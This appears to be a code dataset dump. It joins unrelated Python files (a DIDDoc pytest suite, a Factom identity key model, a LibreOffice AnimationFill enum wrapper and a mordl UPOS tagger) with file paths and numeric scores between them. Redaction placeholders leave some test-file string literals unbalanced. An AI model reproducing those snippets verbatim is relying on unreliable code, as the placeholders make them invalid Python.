'recipientKeys': ['~ZZZZZZZZZZZZZZZZ'],
'serviceEndpoint': 'did:sov:LjgpST2rjsoxYegQDRm7EL;1'
},
{
'id': '1',
'type': 'one',
'priority': 1,
'recipientKeys': [
<KEY>',
'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-1'
],
'routingKeys': [
'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-3'
],
'serviceEndpoint': 'LjgpST2rjsoxYegQDRm7EL;2'
},
{
'id': '2',
'type': 'two',
'priority': 2,
'recipientKeys': [
<KEY>',
'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-1'
],
'routingKeys': [
'did:sov:<KEY>'
],
'serviceEndpoint': 'https://www.two.ca/two'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == 1 + len(dd_in['publicKey'])
assert len(dd.authnkey) == 0
assert {s.priority for s in dd.service.values()} == {0, 1, 2}
assert len(dd.service) == 3
dd_out = dd.serialize()
print('\n\n== 6 == DID Doc on mixed service routing and recipient keys: {}'.format(
ppjson(dd_out)))
# Exercise missing service recipient key
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': '<KEY>',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
}
],
'service': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL;indy',
'type': 'DidMessaging',
'priority': 1,
'recipientKeys': [
'did:sov:<KEY>'
],
'serviceEndpoint': 'https://www.von.ca'
}
]
}
try:
dd = DIDDoc.deserialize(dd_in)
assert False
except AbsentDIDDocItem:
pass
print('\n\n== 7 == DID Doc on underspecified service key fails as expected') | test/test_a2a.py | import json
import pytest
from von_anchor.a2a.diddoc import DIDDoc
from von_anchor.error import AbsentDIDDocItem
from von_anchor.frill import Ink, ppjson
@pytest.mark.asyncio
async def test_a2a():
print(Ink.YELLOW('\n\n== Testing DID Doc wranglers =='))
# One authn key by reference
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': '3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC X...'
},
{
'id': '4',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC 9...'
},
{
'id': '6',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'authentication': [
{
'type': 'RsaSignatureAuthentication2018',
'publicKey': 'did:sov:LjgpST2rjsoxYegQDRm7EL#4'
}
],
'service': [
{
'id': '0',
'type': 'Agency',
'serviceEndpoint': 'did:sov:Q4zqM7aXqm7gDQkUVLng9h'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey'])
assert len(dd.authnkey) == len(dd_in['authentication'])
dd_out = dd.serialize()
print('\n\n== 1 == DID Doc on abbreviated identifiers: {}'.format(ppjson(dd_out)))
# One authn key embedded, all possible refs canonical
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': '3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC X...'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#4',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC 9...'
}
],
'authentication': [
{
'type': 'RsaSignatureAuthentication2018',
'publicKey': '<KEY>'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#6',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'service': [
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL;0',
'type': 'Agency',
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey']) + 1
assert len(dd.authnkey) == len(dd_in['authentication'])
dd_out = dd.serialize()
print('\n\n== 2 == DID Doc on mixed reference styles, embedded and ref style authn keys: {}'.format(ppjson(dd_out)))
# All references canonical where possible; one authn key embedded and one by reference
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC X...'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#4',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC 9...'
}
],
'authentication': [
{
'type': 'RsaSignatureAuthentication2018',
'publicKey': 'did:sov:<KEY>'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#6',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'service': [
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL;0',
'type': 'DidMessaging',
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey']) + 1
assert len(dd.authnkey) == len(dd_in['authentication'])
dd_out = dd.serialize()
print('\n\n== 3 == DID Doc on canonical refs: {}'.format(ppjson(dd_out)))
# Minimal as per indy-agent test suite without explicit identifiers
dd_in = {
'@context': 'https://w3id.org/did/v1',
'publicKey': [
{
'id': '<KEY>',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
}
],
'service': [
{
'type': 'DidMessaging',
'recipientKeys': ['~<KEY>'],
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == len(dd_in['publicKey'])
assert len(dd.authnkey) == 0
dd_out = dd.serialize()
print('\n\n== 4 == DID Doc miminal style, implcit DID document identifier: {}'.format(
ppjson(dd_out)))
# Minimal + ids as per indy-agent test suite with explicit identifiers; novel service recipient key on raw base58
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL#keys-1',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
}
],
'service': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL;indy',
'type': 'DidMessaging',
'priority': 1,
'recipientKeys': ['~YYYYYYYYYYYYYYYY'],
'serviceEndpoint': 'https://www.von.ca'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == 1 + len(dd_in['publicKey'])
assert len(dd.authnkey) == 0
dd_out = dd.serialize()
print('\n\n== 5 == DID Doc miminal style plus explicit idents and novel raw base58 service recip key: {}'.format(
ppjson(dd_out)))
# Minimal + ids as per indy-agent test suite with explicit identifiers; novel service recipient key on raw base58
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL#keys-1',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
},
{
'id': 'LjgpST2rjsoxYegQDRm7EL#keys-2',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': '~<KEY>'
},
{
'id': 'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-3',
'type': 'RsaVerificationKey2018',
'controller': 'did:sov:LjgpST2rjsoxYegQDRm7EL',
'publicKeyPem': '-----BEGIN PUBLIC A...'
}
],
'service': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL;indy',
'type': 'DidMessaging',
'priority': 0,
'recipientKeys': ['~ZZZZZZZZZZZZZZZZ'],
'serviceEndpoint': 'did:sov:LjgpST2rjsoxYegQDRm7EL;1'
},
{
'id': '1',
'type': 'one',
'priority': 1,
'recipientKeys': [
<KEY>',
'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-1'
],
'routingKeys': [
'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-3'
],
'serviceEndpoint': 'LjgpST2rjsoxYegQDRm7EL;2'
},
{
'id': '2',
'type': 'two',
'priority': 2,
'recipientKeys': [
<KEY>',
'did:sov:LjgpST2rjsoxYegQDRm7EL#keys-1'
],
'routingKeys': [
'did:sov:<KEY>'
],
'serviceEndpoint': 'https://www.two.ca/two'
}
]
}
dd = DIDDoc.deserialize(dd_in)
assert len(dd.pubkey) == 1 + len(dd_in['publicKey'])
assert len(dd.authnkey) == 0
assert {s.priority for s in dd.service.values()} == {0, 1, 2}
assert len(dd.service) == 3
dd_out = dd.serialize()
print('\n\n== 6 == DID Doc on mixed service routing and recipient keys: {}'.format(
ppjson(dd_out)))
# Exercise missing service recipient key
dd_in = {
'@context': 'https://w3id.org/did/v1',
'id': 'LjgpST2rjsoxYegQDRm7EL',
'publicKey': [
{
'id': '<KEY>',
'type': 'Ed25519VerificationKey2018',
'controller': 'LjgpST2rjsoxYegQDRm7EL',
'publicKeyBase58': <KEY>'
}
],
'service': [
{
'id': 'LjgpST2rjsoxYegQDRm7EL;indy',
'type': 'DidMessaging',
'priority': 1,
'recipientKeys': [
'did:sov:<KEY>'
],
'serviceEndpoint': 'https://www.von.ca'
}
]
}
try:
dd = DIDDoc.deserialize(dd_in)
assert False
except AbsentDIDDocItem:
pass
print('\n\n== 7 == DID Doc on underspecified service key fails as expected') | 0.345989 | 0.29088 |
import json
from . import consts
from collections import OrderedDict
from identitykeys import is_valid_idpub, PublicIdentityKey
class IdentityNotFoundException(Exception):
pass
class Identity:
def __init__(self, did, chain_id):
self.did = did
self.chain_id = chain_id
self.active_keys = {}
self.all_keys = OrderedDict()
self.version = 1
self.name = None
self.created_height = None
self.stage = None
def process_creation(self, entry_hash: str, external_ids: list, content: bytes, stage='pending', height=None):
if stage == 'pending':
assert height is None, 'Stage "pending", height must be None'
elif stage in {'anchored', 'factom'}:
assert isinstance(height, int), 'Stage not "pending", height must not be None'
else:
raise ValueError('Invalid stage. Must be "pending", "factom", or "anchored"')
# Verify that this is a actually an Identity Chain
# Rules:
# - ExtID[0] == "IdentityChain"
# - Content is a proper JSON object with 'version' and 'keys' elements
# - All elements of the 'keys' array are valid public keys (idpub format)
if external_ids[0] != consts.IDENTITY_CHAIN_TAG:
raise IdentityNotFoundException()
try:
content_json = json.loads(content.decode())
except json.JSONDecodeError:
raise IdentityNotFoundException()
if content_json.get('version') == 1:
if not isinstance(content_json.get('keys'), list):
raise IdentityNotFoundException()
for i, key in enumerate(content_json['keys']):
if not is_valid_idpub(key):
raise IdentityNotFoundException()
elif key in self.active_keys:
continue
key_object = {
'id': '{}#key-{}'.format(self.did, i),
'controller': self.did,
'type': consts.PUBLIC_KEY_TYPE,
'publicKeyHex': PublicIdentityKey(key_string=key).to_bytes().hex(),
'activatedHeight': height,
'retiredHeight': None,
'priority': i,
'entryHash': entry_hash
}
self.active_keys[key] = key_object
self.all_keys[key] = key_object
else:
raise IdentityNotFoundException()
self.version = content_json.get('version')
self.name = [x.decode() for x in external_ids[1:]]
self.created_height = height
self.stage = stage
def process_key_replacement(self, entry_hash: str, external_ids: list, height: int):
if len(external_ids) != 5 or external_ids[0] != consts.KEY_REPLACEMENT_TAG:
return
old_key = external_ids[1].decode()
new_key = external_ids[2].decode()
signature = external_ids[3]
signer_key = external_ids[4].decode()
# all provided keys must be valid
if not is_valid_idpub(old_key) or not is_valid_idpub(new_key) or not is_valid_idpub(signer_key):
return False
# new_key must never have been active
if new_key in self.all_keys:
return False
# old_key and signer_key must be currently active
if old_key not in self.active_keys or signer_key not in self.active_keys:
return False
# signer_key must be the same (or higher) priority as old_key
old_priority = self.active_keys[old_key]['priority']
if old_priority < self.active_keys[signer_key]['priority']:
return False
# Finally check the signature
message = self.chain_id.encode() + old_key.encode() + new_key.encode()
k = PublicIdentityKey(key_string=signer_key)
if not k.verify(signature, message):
return False
# Key replacement is valid and finalized
self.all_keys[old_key]['retiredHeight'] = height
new_key_object = {
'id': '{}#key-{}'.format(self.did, old_priority),
'controller': self.did,
'type': consts.PUBLIC_KEY_TYPE,
'publicKeyHex': PublicIdentityKey(key_string=new_key).to_bytes().hex(),
'activatedHeight': height,
'retiredHeight': None,
'priority': old_priority,
'entryHash': entry_hash
}
del self.active_keys[old_key]
self.active_keys[new_key] = new_key_object
self.all_keys[new_key] = new_key_object
return True
def get_did_document(self):
key_count = len(self.active_keys)
did_document = {
'@context': consts.DID_CONTEXT,
'id': self.did,
'service': [],
'publicKey': list(self.active_keys.values()),
'authentication': ['{}#key-{}'.format(self.did, key_count - 1)]
}
return did_document
def get_method_metadata(self):
return {
'version': self.version,
'name': self.name,
'createdHeight': self.created_height,
'stage': self.stage,
'publicKeyHistory': list(self.all_keys.values())
} | src/models.py | import json
from . import consts
from collections import OrderedDict
from identitykeys import is_valid_idpub, PublicIdentityKey
class IdentityNotFoundException(Exception):
pass
class Identity:
def __init__(self, did, chain_id):
self.did = did
self.chain_id = chain_id
self.active_keys = {}
self.all_keys = OrderedDict()
self.version = 1
self.name = None
self.created_height = None
self.stage = None
def process_creation(self, entry_hash: str, external_ids: list, content: bytes, stage='pending', height=None):
if stage == 'pending':
assert height is None, 'Stage "pending", height must be None'
elif stage in {'anchored', 'factom'}:
assert isinstance(height, int), 'Stage not "pending", height must not be None'
else:
raise ValueError('Invalid stage. Must be "pending", "factom", or "anchored"')
# Verify that this is a actually an Identity Chain
# Rules:
# - ExtID[0] == "IdentityChain"
# - Content is a proper JSON object with 'version' and 'keys' elements
# - All elements of the 'keys' array are valid public keys (idpub format)
if external_ids[0] != consts.IDENTITY_CHAIN_TAG:
raise IdentityNotFoundException()
try:
content_json = json.loads(content.decode())
except json.JSONDecodeError:
raise IdentityNotFoundException()
if content_json.get('version') == 1:
if not isinstance(content_json.get('keys'), list):
raise IdentityNotFoundException()
for i, key in enumerate(content_json['keys']):
if not is_valid_idpub(key):
raise IdentityNotFoundException()
elif key in self.active_keys:
continue
key_object = {
'id': '{}#key-{}'.format(self.did, i),
'controller': self.did,
'type': consts.PUBLIC_KEY_TYPE,
'publicKeyHex': PublicIdentityKey(key_string=key).to_bytes().hex(),
'activatedHeight': height,
'retiredHeight': None,
'priority': i,
'entryHash': entry_hash
}
self.active_keys[key] = key_object
self.all_keys[key] = key_object
else:
raise IdentityNotFoundException()
self.version = content_json.get('version')
self.name = [x.decode() for x in external_ids[1:]]
self.created_height = height
self.stage = stage
def process_key_replacement(self, entry_hash: str, external_ids: list, height: int):
if len(external_ids) != 5 or external_ids[0] != consts.KEY_REPLACEMENT_TAG:
return
old_key = external_ids[1].decode()
new_key = external_ids[2].decode()
signature = external_ids[3]
signer_key = external_ids[4].decode()
# all provided keys must be valid
if not is_valid_idpub(old_key) or not is_valid_idpub(new_key) or not is_valid_idpub(signer_key):
return False
# new_key must never have been active
if new_key in self.all_keys:
return False
# old_key and signer_key must be currently active
if old_key not in self.active_keys or signer_key not in self.active_keys:
return False
# signer_key must be the same (or higher) priority as old_key
old_priority = self.active_keys[old_key]['priority']
if old_priority < self.active_keys[signer_key]['priority']:
return False
# Finally check the signature
message = self.chain_id.encode() + old_key.encode() + new_key.encode()
k = PublicIdentityKey(key_string=signer_key)
if not k.verify(signature, message):
return False
# Key replacement is valid and finalized
self.all_keys[old_key]['retiredHeight'] = height
new_key_object = {
'id': '{}#key-{}'.format(self.did, old_priority),
'controller': self.did,
'type': consts.PUBLIC_KEY_TYPE,
'publicKeyHex': PublicIdentityKey(key_string=new_key).to_bytes().hex(),
'activatedHeight': height,
'retiredHeight': None,
'priority': old_priority,
'entryHash': entry_hash
}
del self.active_keys[old_key]
self.active_keys[new_key] = new_key_object
self.all_keys[new_key] = new_key_object
return True
def get_did_document(self):
key_count = len(self.active_keys)
did_document = {
'@context': consts.DID_CONTEXT,
'id': self.did,
'service': [],
'publicKey': list(self.active_keys.values()),
'authentication': ['{}#key-{}'.format(self.did, key_count - 1)]
}
return did_document
def get_method_metadata(self):
return {
'version': self.version,
'name': self.name,
'createdHeight': self.created_height,
'stage': self.stage,
'publicKeyHistory': list(self.all_keys.values())
} | 0.625552 | 0.135518 |
from enum import IntEnum
from typing import TYPE_CHECKING
from ooo.oenv.env_const import UNO_ENVIRONMENT, UNO_RUNTIME
_DYNAMIC = False
if (not TYPE_CHECKING) and UNO_RUNTIME and UNO_ENVIRONMENT:
_DYNAMIC = True
if not TYPE_CHECKING and _DYNAMIC:
from com.sun.star.animations import AnimationFill as AnimationFill
if hasattr(AnimationFill, '_constants') and isinstance(AnimationFill._constants, dict):
AnimationFill._constants['__ooo_ns__'] = 'com.sun.star.animations'
AnimationFill._constants['__ooo_full_ns__'] = 'com.sun.star.animations.AnimationFill'
AnimationFill._constants['__ooo_type_name__'] = 'const'
def build_enum():
global AnimationFillEnum
ls = [f for f in dir(AnimationFill) if not callable(getattr(AnimationFill, f)) and not f.startswith('__')]
_dict = {}
for name in ls:
_dict[name] = getattr(AnimationFill, name)
AnimationFillEnum = IntEnum('AnimationFillEnum', _dict)
build_enum()
else:
from ...lo.animations.animation_fill import AnimationFill as AnimationFill
class AnimationFillEnum(IntEnum):
"""
Enum of Const Class AnimationFill
This constants are used for the members fill() and fillDefault() of the an XTimeContainer.
"""
DEFAULT = AnimationFill.DEFAULT
"""
The fill behavior for the element is determined by the value of the XTiming.FillDefault attribute.
This is the default value for the XTiming.Fill... If the application of fillDefault to an element would result in the element having a value of fill that is not allowed on that element, the element will instead have a fill value of AnimationFill.AUTO.
"""
INHERIT = AnimationFill.INHERIT
"""
Specifies that the value of this attribute (and of the fill behavior) are inherited from the XTiming.FillDefault value of the parent element.
If there is no parent element, the value is AnimationFill.AUTO. This is the default value for the XTiming.FillDefault.
"""
REMOVE = AnimationFill.REMOVE
"""
Specifies that the element will not extend past the end of the last instance of the simple duration.
"""
FREEZE = AnimationFill.FREEZE
"""
Specifies that the element will extend past the end of the last instance of the simple duration by \"freezing\" the element state at that point.
The parent time container of the element determines how long the element is frozen (as described immediately below).
"""
HOLD = AnimationFill.HOLD
"""
Setting this to \"hold\" has the same effect as setting to \"freeze\", except that the element is always frozen to extend to the end of the simple duration of the parent time container of the element (independent of the type of time container).
For profiles that support a layered layout model (e.g., SMIL 2.0 Language Profile), held elements (elements with fill=\"hold\") will refresh their display area when a layer is added on top then later removed.
"""
TRANSITION = AnimationFill.TRANSITION
"""
Setting this to \"transition\" has the same effect as setting to \"freeze\", except that the element is removed at the end of the transition.
This value is only allowed on elements with media directly associated with them. If specified on any other element (e.g. a time container element in the SMIL language profile), the attribute is ignored. See the SMIL Transitions module.
"""
AUTO = AnimationFill.AUTO
"""
The fill behavior for this element depends on whether the element specifies any of the attributes that define the simple or active duration:
"""
__all__ = ['AnimationFill', 'AnimationFillEnum'] | ooobuild/dyn/animations/animation_fill.py | from enum import IntEnum
from typing import TYPE_CHECKING
from ooo.oenv.env_const import UNO_ENVIRONMENT, UNO_RUNTIME
_DYNAMIC = False
if (not TYPE_CHECKING) and UNO_RUNTIME and UNO_ENVIRONMENT:
_DYNAMIC = True
if not TYPE_CHECKING and _DYNAMIC:
from com.sun.star.animations import AnimationFill as AnimationFill
if hasattr(AnimationFill, '_constants') and isinstance(AnimationFill._constants, dict):
AnimationFill._constants['__ooo_ns__'] = 'com.sun.star.animations'
AnimationFill._constants['__ooo_full_ns__'] = 'com.sun.star.animations.AnimationFill'
AnimationFill._constants['__ooo_type_name__'] = 'const'
def build_enum():
global AnimationFillEnum
ls = [f for f in dir(AnimationFill) if not callable(getattr(AnimationFill, f)) and not f.startswith('__')]
_dict = {}
for name in ls:
_dict[name] = getattr(AnimationFill, name)
AnimationFillEnum = IntEnum('AnimationFillEnum', _dict)
build_enum()
else:
from ...lo.animations.animation_fill import AnimationFill as AnimationFill
class AnimationFillEnum(IntEnum):
"""
Enum of Const Class AnimationFill
This constants are used for the members fill() and fillDefault() of the an XTimeContainer.
"""
DEFAULT = AnimationFill.DEFAULT
"""
The fill behavior for the element is determined by the value of the XTiming.FillDefault attribute.
This is the default value for the XTiming.Fill... If the application of fillDefault to an element would result in the element having a value of fill that is not allowed on that element, the element will instead have a fill value of AnimationFill.AUTO.
"""
INHERIT = AnimationFill.INHERIT
"""
Specifies that the value of this attribute (and of the fill behavior) are inherited from the XTiming.FillDefault value of the parent element.
If there is no parent element, the value is AnimationFill.AUTO. This is the default value for the XTiming.FillDefault.
"""
REMOVE = AnimationFill.REMOVE
"""
Specifies that the element will not extend past the end of the last instance of the simple duration.
"""
FREEZE = AnimationFill.FREEZE
"""
Specifies that the element will extend past the end of the last instance of the simple duration by \"freezing\" the element state at that point.
The parent time container of the element determines how long the element is frozen (as described immediately below).
"""
HOLD = AnimationFill.HOLD
"""
Setting this to \"hold\" has the same effect as setting to \"freeze\", except that the element is always frozen to extend to the end of the simple duration of the parent time container of the element (independent of the type of time container).
For profiles that support a layered layout model (e.g., SMIL 2.0 Language Profile), held elements (elements with fill=\"hold\") will refresh their display area when a layer is added on top then later removed.
"""
TRANSITION = AnimationFill.TRANSITION
"""
Setting this to \"transition\" has the same effect as setting to \"freeze\", except that the element is removed at the end of the transition.
This value is only allowed on elements with media directly associated with them. If specified on any other element (e.g. a time container element in the SMIL language profile), the attribute is ignored. See the SMIL Transitions module.
"""
AUTO = AnimationFill.AUTO
"""
The fill behavior for this element depends on whether the element specifies any of the attributes that define the simple or active duration:
"""
__all__ = ['AnimationFill', 'AnimationFillEnum'] | 0.667473 | 0.194081 |
from corpuscula import CorpusDict
from junky import get_func_params
from mordl.base_tagger import BaseTagger
from mordl.defaults import BATCH_SIZE, CDICT_COEF_THRESH ,LOG_FILE, \
TRAIN_BATCH_SIZE
from mordl.upos_tagger_model import UposTaggerModel
import time
_CDICT_COEF_THRESH = .99
class UposTagger(BaseTagger):
"""
The UPOS tagger class.
Args:
**field** (`str`; default is `UPOS`): the name of the *CoNLL-U* field,
values of which needs to be predicted. With this tagger, you can predict
only fields with atomicvalues, like UPOS.
**embs** (`dict({str: object}); default is `None`): the `dict` with paths
to embeddings files as keys and corresponding embedding models as values.
If the tagger needs to load any embedding model, firstly, the model is
looked up it in that `dict`.
During init, **embs** is copied to the `embs` attribute of the creating
object, and this attribute may be used further to share already loaded
embeddings with another taggers.
"""
def __init__(self, field='UPOS', embs=None):
super().__init__(embs=embs)
self._field = field
def load(self, name, device=None,
dataset_emb_path=None, dataset_device=None, log_file=LOG_FILE):
"""Loads tagger's internal state saved by its `.save()` method.
Args:
**name** (`str`): the name of the previously saved internal state.
**device** (`str`; default is `None`): the device for the loaded model
if you want to override the value from the config.
**dataset_emb_path** (`str`; default is `None`): the path where the
dataset's embeddings to load from if you want to override the value
from the config.
**dataset_device** (`str`; default is `None`): the device for the
loaded dataset if you want to override the value from the config.
**log_file** (`file`; default is `sys.stdout`): the stream for info
messages.
"""
args, kwargs = get_func_params(UposTagger.load, locals())
super().load(UposTaggerModel, *args, **kwargs)
def _check_cdict(self, sentence, use_cdict_coef):
if use_cdict_coef not in [None, False]:
isfirst = True
for token in sentence[0] if isinstance(sentence, tuple) else \
sentence:
id_, form = token['ID'], token['FORM']
if form and '-' not in id_:
guess, coef = \
self._cdict.predict_tag(form, isfirst=isfirst)
isfirst = False
if coef is not None \
and coef >= (CDICT_COEF_THRESH
if use_cdict_coef is True else
use_cdict_coef):
token['UPOS'] = guess
return sentence
def predict(self, corpus, use_cdict_coef=False, with_orig=False,
batch_size=BATCH_SIZE, split=None, clone_ds=False,
save_to=None, log_file=LOG_FILE):
"""Predicts tags in the UPOS field of the corpus.
Args:
**corpus**: the corpus which will be used for the feature extraction
and predictions. May be either the name of the file in *CoNLL-U*
format or the `list`/`iterator` of sentences in *Parsed CoNLL-U*.
**use_cdict_coef** (`bool` | `float`; default is `False`): if `False`,
we use our prediction only. If `True`, we replace our prediction to
the value returned by the `corpuscula.CorpusDict.predict_<field>()`
method if its `coef` >= `.99`. Also, you can specify your own
threshold as the value of the param.
**with_orig** (`bool`; default is `False`): if `True`, instead of just
the sequence with predicted labels, return the sequence of tuples
where the first element is the sentence with predicted labels and the
second element is the original sentence. **with_orig** can be `True`
only if **save_to** is `None`.
**batch_size** (`int`; default is `64`): the number of sentences per
batch.
**split** (`int`; default is `None`): the number of lines in sentences
split. Allows to process a large dataset in pieces ("splits"). If
**split** is `None` (default), all the dataset is processed without
splits.
**clone_ds** (`bool`; default is `False`): if `True`, the dataset is
cloned and transformed. If `False`, `transform_collate` is used
without cloning the dataset. There is no big differences between the
variants. Both should produce identical results.
**save_to** (`str`; default is `None`): the file name where the
predictions will be saved.
**log_file** (`file`; default is `sys.stdout`): the stream for info
messages.
Returns the corpus with tags predicted in the UPOS field.
"""
assert self._field == 'UPOS' or use_cdict_coef in [None, False], \
'ERROR: "use_cdict_coef" param may be used only with UPOS field'
args, kwargs = get_func_params(UposTagger.predict, locals())
return super().predict(self._field, None, *args, **kwargs)
def evaluate(self, gold, test=None, label=None, use_cdict_coef=False,
batch_size=BATCH_SIZE, split=None, clone_ds=False,
log_file=LOG_FILE):
"""Evaluate the tagger model.
Args:
**gold**: the corpus of sentences with actual target values to score
the tagger on. May be either the name of the file in *CoNLL-U* format
or the `list`/`iterator` of sentences in *Parsed CoNLL-U*.
**test** (default is `None`): the corpus of sentences with predicted
target values. If `None` (default), the **gold** corpus will be
retagged on-the-fly, and the result will be used as the **test**.
**label** (`str`; default is `None`): the specific label of the target
field to be evaluated separatedly, e.g. `field='UPOS', label='VERB'`
or `field='FEATS:Animacy', label='Inan'`.
**use_cdict_coef** (`bool` | `float`; default is `False`): if `False`,
we use our prediction only. If `True`, we replace our prediction to
the value returned by the `corpuscula.CorpusDict.predict_<field>()`
method if its `coef` >= `.99`. Also, you can specify your own
threshold as the value of the param.
**batch_size** (`int`; default is `64`): the number of sentences per
batch.
**split** (`int`; default is `None`): the number of lines in sentences
split. Allows to process a large dataset in pieces ("splits"). If
**split** is `None` (default), all the dataset is processed without
splits.
**clone_ds** (`bool`; default is `False`): if `True`, the dataset is
cloned and transformed. If `False`, `transform_collate` is used
without cloning the dataset. There is no big differences between the
variants. Both should produce identical results.
**log_file** (`file`; default is `sys.stdout`): the stream for info
messages.
The method prints metrics and returns evaluation accuracy.
"""
args, kwargs = get_func_params(UposTagger.evaluate, locals())
return super().evaluate(self._field, *args, **kwargs)
def train(self, save_as,
device=None, control_metric='accuracy', max_epochs=None,
min_epochs=0, bad_epochs=5, batch_size=TRAIN_BATCH_SIZE,
max_grad_norm=None, tags_to_remove=None, word_emb_type='bert',
word_emb_path='xlm-roberta-base', word_transform_kwargs=None,
# BertDataset.transform() (for BERT-descendant models)
# params:
# {'max_len': 0, 'batch_size': 64, 'hidden_ids': '10',
# 'aggregate_hiddens_op': 'cat',
# 'aggregate_subtokens_op': 'absmax', 'to': junky.CPU,
# 'loglevel': 1}
# WordDataset.transform() (for other models) params:
# {'check_lower': True}
stage1_params=None,
# {'lr': .0001, 'betas': (0.9, 0.999), 'eps': 1e-8,
# 'weight_decay': 0, 'amsgrad': False,
# 'max_epochs': None, 'min_epochs': None,
# 'bad_epochs': None, 'batch_size': None,
# 'max_grad_norm': None}
stage2_params=None,
# {'lr': .001, 'momentum': .9, 'weight_decay': 0,
# 'dampening': 0, 'nesterov': False,
# 'max_epochs': None, 'min_epochs': None,
# 'bad_epochs': None, 'batch_size': None,
# 'max_grad_norm': None}
stage3_params={'save_as': None},
# {'save_as': None, 'epochs': 3, 'batch_size': 8,
# 'lr': 2e-5, 'betas': (0.9, 0.999), 'eps': 1e-8,
# 'weight_decay': .01, 'amsgrad': False,
# 'num_warmup_steps': 3, 'max_grad_norm': 1.}
stages=[1, 2, 3, 1, 2], save_stages=False, load_from=None,
learn_on_padding=True, remove_padding_intent=False,
seed=None, start_time=None, keep_embs=False, log_file=LOG_FILE,
rnn_emb_dim=None, cnn_emb_dim=None, cnn_kernels=range(1, 7),
emb_bn=True, emb_do=.2,
final_emb_dim=512, pre_bn=True, pre_do=.5,
lstm_layers=1, lstm_do=0, tran_layers=0, tran_heads=8,
post_bn=True, post_do=.4):
"""Creates and trains the UPOS tagger model.
During training, the best model is saved after each successful epoch.
*Training's args*:
**save_as** (`str`): the name using for save the model's head. Refer
to the `.save()` method's help for the broad definition (see the
**name** arg there).
**device** (`str`, default is `None`): the device for the model. E.g.:
'cuda:0'. If `None`, we don't move the model to any device (it is
placed right where it's created).
**control_metric** (`str`; default is `accuracy`): the metric that
control training. Any that is supported by the `junky.train()` method.
In the moment, it is: 'accuracy', 'f1', 'loss', 'precision', and
'recall'.
**max_epochs** (`int`; default is `None`): the maximal number of
epochs for the model's head training (stages types `1` and `2`). If
`None` (default), the training would be linger until **bad_epochs**
has met, but no less than **min_epochs**.
**min_epochs** (`int`; default is `0`): the minimal number of training
epochs for the model's head training (stages types `1` and `2`).
